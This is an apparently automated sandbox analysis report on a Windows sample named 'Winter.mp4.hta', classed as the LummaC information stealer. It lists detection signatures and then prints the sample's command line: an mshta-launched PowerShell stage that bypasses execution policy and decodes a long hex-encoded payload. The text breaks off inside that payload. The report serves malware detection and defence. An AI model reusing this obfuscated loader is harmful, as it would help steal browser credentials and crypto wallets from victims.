Edit tour
Windows
Analysis Report
Winter.mp4.hta
Overview
General Information
Detection
LummaC
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Powershell Download and Execute IEX
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
Yara detected Powershell download and execute
.NET source code contains potential unpacker
AI detected suspicious sample
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
LummaC encrypted strings found
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: PowerShell Download and Execution Cradles
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious PowerShell Download and Execute Pattern
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w10x64
- mshta.exe (PID: 2000 cmdline:
mshta.exe "C:\Users\ user\Deskt op\Winter. mp4.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505) - powershell.exe (PID: 6624 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -w 1 -ep U nrestricte d -nop fun ction rOnH ($ZugfP){r eturn -spl it ($ZugfP -replace '..', '0x$ & ')};$hcN M = rOnH(' C3930BC548 71F266AFF2 C12A03BE01 BAC619730D 50B7B29684 8B0CE355EF 4AAD63DAD5 51CF518740 CFF825344B 7C3E8930AB D7E087DC16 5F9FA69548 1870BD2109 73CEFFE5F8 743015E9E0 67BE32B8D2 8FC34D427F 57004108D4 924938D42B 9C68E78C8B AEEC7B88ED BF7E26D65B BEB339C853 5239837921 2A4DA0FDA9 378FA9EE29 79EF8C68B2 C848B07239 F0FE9081E1 8A3E274742 8EACAB7649 6A5D46ECC6 18715969BE B2AA550FCC 19D2801E74 12D5CCB10D 7FC87B3CCF CA2C5142FF F0A92BF434 E5B0634E25 F43D5A1D49 AF292EF189 95535EADD3 1638736109 0364FCDB53 CF147D3801 5CDE7C196B CB2487A645 FE6E879997 DB0B013559 AE94AF7AE0 A057520D70 6AABBBB3C4 599241DC59 E43AF4317B BF33FF72B6 3C4D6F40A4 CF4FBA5443 410E7D4FDB B2DAAB0B09 9C9CBBDF16 A73778ACB0 AAF9970D84 B1C2FE0207 3C14045A04 F38EC73D1F 5FE068051B 40E010417A E6630AF70E 00695C608B C086133097 4406C2434C DEF8351AA4 C08151E713 B3E1161BE6 479227D497 878812334F 53852E1619 33DF3AC490 02F901EF72 0BD24EBC00 5803CC3FB5 D9730A3547 4DE935BB0D A3CD0DB74D D2F1A75D4C 2C82DEF41F 1F7E055AA3 5E28F60EBC 5D1AA4CF8B 043E2DB0C3 431EC5B92D 16094A177A F2C20A61C9 12B7DE1A05 E9AC70C3FC 34F259AFBC 8229DE2C74 04FA77695B 9B9B64B6CC CC15261DD3 287767966C 69CA3447D2 9F6C28AAED 13F5700DD3 C2344BBBC4 40EF822FA0 3ED85A6645 8F8096A217 892CE5BD92 B17A636A13 078002A9F1 2DF30BBC21 FBFC278256 74E1F156C0 8B1F7BE811 0450AAAFE8 4A212E2539 E9D958C27C BA9258E0F2 EB2302B3C0 25C3E8F2AF 1D4975B918 F51A7E4B0E 2D658450A8 BAA98DF067 B355E280E6 F33E6D6E72 9F9BF2A721 E484C32FC6 0E22909D4A 00F86690A4 01E2249B69 A64B01B2EF 84D697A10E 34BFB44195 CEFA63C860 3AC785033B 7F295FB45F 066E298773 D832DB3E9A 5C2228A617 A7493C760C F7B8A23497 4A7D9FFE59 773D18E13F 4C2B106A18 753CB10177 D79E9329A5 839F3BBD92 2320BE5C51 6B60190FBF 08E4F48DD9 6D3C6FC263 511D230C8E E4C5016FCA F3F85211AA 23D5D68638 2382D564C6 E8DB3107FB 4842199CEA ABF6EB2587 52F65C408D 2C95BA3AC3 C4BA6634C5 79D8E2AF74 78D305A2B4 54111CA906 551BEDE47D 883C897D12 3DD54DB270 EDB40162ED F8558AB267 3CED455684 8FBD0F0EA7 E491C6CB59 4EC95A7DC5 4749D99912 A60C79DCA4 D598AA2335 146B6D9363 41E271B5EE 53DC7E88AB FE799563C3 F66B92D8E5 3182F74FE6 2D5E058B1D 6A53297469 2D259673F2 16D5E03787 5DF42348A3 CBC56B68E7 F61BB04F8D E43B8B56AF 5F12EE9CE6 35F60999BD 302D33D994 F58D54EACF 34355DBB7E 858E578C3C 464D9DFE38 5CA2BA8CA5 920FA0CD69 D14616CF89 B14B05812B 1E052ECCE3 F7FB706D97 B865FD0C65 06CE32F646 039B92F147 F82037E1BC A4A16EDE04 A52F754852 062CC5FFE7 9F1C1811C2 A4EE43FF38 387C4CD11A 2EDCA6C572 16DFC5D9E2 9ADFF0D5AC CF05998C02 101CD72366 7780F3ECE0 C9D8A3501F 34E27653C8 CC454AC1B9 CFD63C7077 F0256949AD 3E3DAF6C6B 099A8FDFBD